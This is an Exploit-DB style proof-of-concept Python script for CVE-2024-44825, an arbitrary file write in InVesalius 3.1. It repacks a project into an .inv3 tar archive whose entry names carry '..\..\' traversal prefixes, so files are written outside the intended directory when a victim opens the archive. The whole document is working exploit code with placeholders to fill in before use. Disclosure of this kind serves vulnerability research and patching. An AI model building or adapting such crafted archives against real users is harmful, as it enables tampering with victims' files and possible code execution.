# Exploit Title: Invesalius 3.1 - Arbitrary File Write using Directory Traversal 
# Discovered By: Riccardo Degli Esposti (partywave)
# Exploit Author: Riccardo Degli Esposti (partywave)
# Vendor Homepage: https://invesalius.github.io/
# Software Link: https://github.com/invesalius/invesalius3/tree/master/invesalius
# Version: from 3.1.99995 to nightly
# Tested on: Windows
# CVE-ID: CVE-2024-44825

import tarfile
import os
import zipfile

# Disclaimer:
# Tested on Windows
# edit every [CHANGEME] before run this script

# Step 0: Setup local paths
# Adapt your paths
zip_file_path = 'C:\\users\\[CHANGEME]\\downloads\\[CHANGEME].zip'
extracted_folder = 'C:\\users\\[CHANGEME]\\downloads\\[CHANGEME]'

output_tar = 'C:\\users\\[CHANGEME]\\downloads\\local-output.inv3'


main_plist_path = os.path.join(extracted_folder, 'main.plist')

# Ensure the extraction directory exists
os.makedirs(extracted_folder, exist_ok=True)

# Step 1: Extract the ZIP file
with zipfile.ZipFile(zip_file_path, 'r') as zip_ref:
    zip_ref.extractall(extracted_folder)

with open(main_plist_path, 'r') as file:
    main_plist_content = file.read()

# POC of loading new XML
main_plist_content = main_plist_content.replace(
    '<string>ProMED CT 0051</string>', 
    '<string>This is a confirmation modifying the XML</string>'
)

with open(main_plist_path, 'w') as file:
    file.write(main_plist_content)

# Step 3: Create the tar archive
# Adapt where you want write
def rename(tarinfo):
    tarinfo.name = "..\\..\\[CHANGEME]\\" + tarinfo.name
    return tarinfo

with tarfile.open(output_tar, "w:xz") as tar:
    for root, _, files in os.walk(extracted_folder):
        for file in files:
            full_path = os.path.join(root, file)
            arcname = os.path.relpath(full_path, extracted_folder)
            tar.add(full_path, arcname=arcname, filter=rename)

output_tar